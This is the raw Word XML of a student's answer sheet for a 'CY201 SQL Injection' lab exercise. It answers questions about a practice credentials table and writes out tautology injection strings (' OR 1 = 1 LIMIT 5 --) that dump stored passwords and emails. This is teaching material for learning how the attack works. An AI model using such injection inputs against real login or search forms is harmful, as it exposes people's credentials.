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1E9CB9" w14:textId="77777777" w:rsidR="00EF1B56" w:rsidRDefault="000E7017">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sean Poston</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6F2AD1" w14:textId="40C07DCC" w:rsidR="000E7017" w:rsidRDefault="000E7017">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CY201 SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A6DF4A" w14:textId="0E7403F7" w:rsidR="000E7017" w:rsidRDefault="000E7017">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4/20/2020 Blaze It</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C8CA2A" w14:textId="62CB8319" w:rsidR="000E7017" w:rsidRDefault="00A526A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFAF0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question 1: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AF0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A526A5">
        <w:t>What is the email retrieved when the password in 5th step (above) is used?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AF0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3471450D" w14:textId="65B0EC78" w:rsidR="00A526A5" w:rsidRDefault="006C0A3C" w:rsidP="00A526A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00445C73">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>John1s@semo.edu</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="658901E1" w14:textId="77777777" w:rsidR="006C0A3C" w:rsidRPr="006C0A3C" w:rsidRDefault="006C0A3C" w:rsidP="006C0A3C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="719E3C00" w14:textId="77777777" w:rsidR="00A526A5" w:rsidRPr="00A526A5" w:rsidRDefault="00A526A5" w:rsidP="00A526A5">
      <w:r w:rsidRPr="00A526A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A526A5">
        <w:t xml:space="preserve"> What is the email retrieved for the following SQL command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E70C95B" w14:textId="77777777" w:rsidR="00A526A5" w:rsidRPr="00A526A5" w:rsidRDefault="00A526A5" w:rsidP="00A526A5">
      <w:r w:rsidRPr="00A526A5">
        <w:t>SELECT email FROM credentials WHERE password = ‘12233432' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3A00C3" w14:textId="613D71E8" w:rsidR="00A526A5" w:rsidRDefault="00F36089" w:rsidP="00F3608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Error is returned, no password matches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D47C68C" w14:textId="77777777" w:rsidR="006C0A3C" w:rsidRPr="006C0A3C" w:rsidRDefault="006C0A3C" w:rsidP="006C0A3C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0EA7E5" w14:textId="77777777" w:rsidR="00A526A5" w:rsidRPr="00EA2D9B" w:rsidRDefault="00A526A5" w:rsidP="00EA2D9B">
      <w:r w:rsidRPr="00EA2D9B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2D9B">
        <w:t xml:space="preserve"> What is the data retrieved for the following SQL command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334BB2AA" w14:textId="77777777" w:rsidR="00A526A5" w:rsidRPr="00EA2D9B" w:rsidRDefault="00A526A5" w:rsidP="00EA2D9B">
      <w:r w:rsidRPr="00EA2D9B">
        <w:t>SELECT * FROM credentials WHERE password = 'harry' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A00FA3A" w14:textId="6B5946EC" w:rsidR="00A526A5" w:rsidRDefault="00B721BE" w:rsidP="00B721B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It returns the id, email, and password for </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00445C73">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>rick@semo.edu</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00445C73">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>jane@semo.edu</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="006C0A3C" w:rsidRPr="00445C73">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>max@semo.edu</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B8CAE90" w14:textId="77777777" w:rsidR="006C0A3C" w:rsidRPr="006C0A3C" w:rsidRDefault="006C0A3C" w:rsidP="006C0A3C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B3F719A" w14:textId="77777777" w:rsidR="00A526A5" w:rsidRPr="00EA2D9B" w:rsidRDefault="00A526A5" w:rsidP="00EA2D9B">
      <w:r w:rsidRPr="00EA2D9B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2D9B">
        <w:t xml:space="preserve"> What is the data retrieved for the following SQL command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF609FE" w14:textId="77777777" w:rsidR="00A526A5" w:rsidRPr="00EA2D9B" w:rsidRDefault="00A526A5" w:rsidP="00EA2D9B">
      <w:r w:rsidRPr="00EA2D9B">
        <w:t>SELECT password FROM credentials WHERE email = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2D9B">
        <w:t>xxx@xxx.xxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2D9B">
        <w:t>' OR 1 = 1 LIMIT 1 -- ' ] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467339BD" w14:textId="40E305D0" w:rsidR="00A526A5" w:rsidRDefault="000A7612" w:rsidP="000A761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It returns the password ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>abcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062CF5B" w14:textId="77777777" w:rsidR="006C0A3C" w:rsidRPr="006C0A3C" w:rsidRDefault="006C0A3C" w:rsidP="006C0A3C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66958A11" w14:textId="5425C746" w:rsidR="00A526A5" w:rsidRDefault="00A526A5">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question 5: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2D9B">
        <w:t>Modify above command to increase the limit to 5 and display the output. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C79DC2" w14:textId="49CC3D7C" w:rsidR="00C224C6" w:rsidRPr="00EA2D9B" w:rsidRDefault="00C224C6" w:rsidP="008A6352">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2D9B">
        <w:t>SELECT password FROM credentials WHERE email = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EA2D9B">
        <w:t>xxx@xxx.xxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EA2D9B">
        <w:t xml:space="preserve">' OR 1 = 1 LIMIT </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2D9B">
        <w:t xml:space="preserve"> -- ' ] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485AB779" w14:textId="77777777" w:rsidR="00EA2D9B" w:rsidRPr="00EA2D9B" w:rsidRDefault="00EA2D9B"/>
    <w:p w14:paraId="5DB6C1BE" w14:textId="568E07D3" w:rsidR="00A526A5" w:rsidRDefault="00A526A5">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Question 6: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA2D9B">
        <w:t>Modify above command to include the email address. Hint: "SELECT * FROM..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF1999" w14:textId="3F787998" w:rsidR="008413FF" w:rsidRPr="00EA2D9B" w:rsidRDefault="008413FF" w:rsidP="008413FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008413FF">
        <w:t>SELECT * FROM credentials WHERE email = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008413FF">
        <w:t>xxx@xxx.xxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008413FF">
        <w:t>' OR 1 = 1 LIMIT 5 -- ' ];</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="008413FF" w:rsidRPr="00EA2D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665BB3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="422AB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017"/>
    <w:rsid w:val="000A7612"/>
    <w:rsid w:val="000E7017"/>
    <w:rsid w:val="006C0A3C"/>
    <w:rsid w:val="00817239"/>
    <w:rsid w:val="008413FF"/>
    <w:rsid w:val="008A6352"/>
    <w:rsid w:val="00A526A5"/>
    <w:rsid w:val="00B721BE"/>
    <w:rsid w:val="00C224C6"/>
    <w:rsid w:val="00CC6D5F"/>
    <w:rsid w:val="00EA2D9B"/>
    <w:rsid w:val="00F36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39273"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{53538E7A-9566-41B6-ACFE-70290FCA9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26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526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21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21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29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4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x@semo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ane@semo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ick@semo.edu" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:John1s@semo.ed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Poston</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sean Poston</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-21T03:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-21T03:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>